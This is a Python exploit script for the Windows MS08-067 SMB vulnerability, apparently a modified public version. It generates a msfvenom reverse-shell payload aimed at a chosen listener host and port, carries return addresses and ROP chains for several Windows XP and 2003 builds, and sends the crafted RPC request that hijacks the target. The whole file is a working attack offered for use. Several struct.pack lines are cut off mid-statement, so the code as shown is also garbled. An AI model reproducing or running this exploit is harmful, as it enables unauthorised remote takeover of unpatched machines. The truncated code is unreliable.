Updated MS08-067 exploit without custom netcat listener.
| #!/usr/bin/python |
| ############################################################################################### |
| # MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 # |
| # Designed for Kali Linux - msfvenom and nc required to function # |
| # Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ # |
| # Modified version of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). # |
| # The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi # |
| ############################################################################################### |
| import struct |
| import time |
| import sys |
| import subprocess # Added to integrate msfvenom payload generation functionality |
| from threading import Thread #Thread is imported incase you would like to modify |
| try: |
| from impacket import smb |
| from impacket import uuid |
| from impacket import dcerpc |
| from impacket.dcerpc.v5 import transport |
| except ImportError, _: |
| print 'Install the following library to make this script work' |
| print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' |
| print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' |
| sys.exit(1) |
| if __name__ == '__main__': |
| try: |
| target = sys.argv[1] |
| os = sys.argv[2] |
| lhost = sys.argv[3] |
| lport = sys.argv[4] |
| except IndexError: |
| print '' |
| print ' ____________________________________________' |
| print ' | |' |
| print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
| print ' | Based On Ported MSF Exploit By EKOZ |' |
| print ' |____________________________________________|' |
| print ' | |' |
| print ' | USAGE |' |
| print ' | MS08-067.py |
| print ' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |' |
| print ' |____________________________________________|' |
| print ' | |' |
| print ' | TARGET OS SELECTION |' |
| print ' | 1 = Windows XP SP0/SP1 Universal |' |
| print ' | 2 = Windows 2000 Universal |' |
| print ' | 3 = Windows 2003 SP0 Universal |' |
| print ' | 4 = Windows 2003 SP1 English |' |
| print ' | 5 = Windows XP SP3 French (NX) |' |
| print ' | 6 = Windows XP SP3 English (NX) |' |
| print ' | 7 = Windows XP SP3 English (AlwaysOn NX) |' |
| print ' |____________________________________________|\r\n' |
| print ' I suggest you use a stageless payload to avoid issues with the handler.' |
| sys.exit(-1) |
| #badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40; |
| #Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes |
| #EXITFUNC=thread Important! |
| # msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python |
| # Auto Generate Reverse Shell Payload Using msfvenom |
| mksh = "msfvenom -p windows/shell_reverse_tcp" |
| mksh += " -b \'\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\'" |
| mksh += " -e x86/call4_dword_xor" |
| mksh += " EXITFUNC=thread" |
| mksh += " --nopsled=32" |
| mksh += " LHOST="+lhost |
| mksh += " LPORT="+lport |
| mksh += " -f python " |
| mksh += " -a x86" |
| mksh += " -o RevPld.py" |
| print ' ____________________________________________' |
| print ' | |' |
| print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |' |
| print ' | Based On Ported MSF Exploit By EKOZ |' |
| print ' |____________________________________________|\r\n' |
| try: |
| print "[+] Attempting To Generate Reverse Shell Payload ..." |
| vnm = subprocess.Popen(mksh.split(), stdout=subprocess.PIPE) |
| vnm.wait() |
| print "[+] Reverse Shell Payload Generated Successfully..." |
| except: |
| print "[!] ERROR: Couldn't Generate Payload " |
| sys.exit(-1) |
| from RevPld import buf |
| nops = "\x90"*30 |
| nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10 |
| disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62" |
| ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01"; |
| module_base = 0x6f880000 |
| def generate_rop(rvas): |
| gadget1="\x90\x5a\x59\xc3" |
| gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] |
| gadget3="\xcc\x90\xeb\x5a" |
| ret=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget1 |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget2[0] |
| ret+=gadget2[1] |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget2[2] |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=struct.pack(' |
| ret+=gadget3 |
| return ret |
| class SRVSVC_Exploit(Thread): |
| def __init__(self, target, os, port=445): |
| super(SRVSVC_Exploit, self).__init__() |
| self.__port = port |
| self.target = target |
| self.os = os |
| def __DCEPacket(self): |
| if (self.os=='1'): |
| print '[+] Targeting : Windows XP SP0/SP1 Universal' |
| ret = "\x61\x13\x00\x01" |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='2'): |
| print '[+] Targeting : Windows 2000 Universal' |
| ret = "\xb0\x1c\x1f\x00" |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='3'): |
| print '[+] Targeting : Windows 2003 SP0 Universal' |
| ret = "\x9e\x12\x00\x01" #0x01 00 12 9e |
| jumper = nonxjmper % (ret, ret) |
| elif (self.os=='4'): |
| print '[+] Targeting : Windows 2003 SP1 English' |
| ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL |
| ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL |
| jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL |
| disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL |
| jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2) |
| elif (self.os=='5'): |
| print '[+] Targeting : Windows XP SP3 French (NX)' |
| ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07 |
| disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 |
| jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
| elif (self.os=='6'): |
| print '[+] Targeting : Windows XP SP3 English (NX)' |
| ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07 |
| disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 |
| jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. |
| elif (self.os=='7'): |
| print '[+] Targeting : Windows XP SP3 English (AlwaysOn NX)' |
| rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64} |
| jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case. |
| else: |
| print '[+] OS Version Not Supported\n' |
| sys.exit(-1) |
| print '[+] Initiating Connection To '+target+":445" |
| self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) |
| self.__trans.connect() |
| self.__dce = self.__trans.DCERPC_class(self.__trans) |
| self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) |
| path ="\x5c\x00"+"ABCDEFGHIJ"*10 + nops + buf +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" |
| path += "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 |
| server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" |
| prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" |
| self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00" |
| return |
| def run(self): |
| self.__DCEPacket() |
| self.__dce.call(0x1f, self.__stub) |
| current = SRVSVC_Exploit(target, os) |
| current.start() |
| print "Now start up a multi/handler with your payload options set to: " |
| print "payload windows/shell_reverse_tcp" # seems to be the most stable and consistent. |
| print "LHOST ", lhost |
| print "LPORT ", lport |



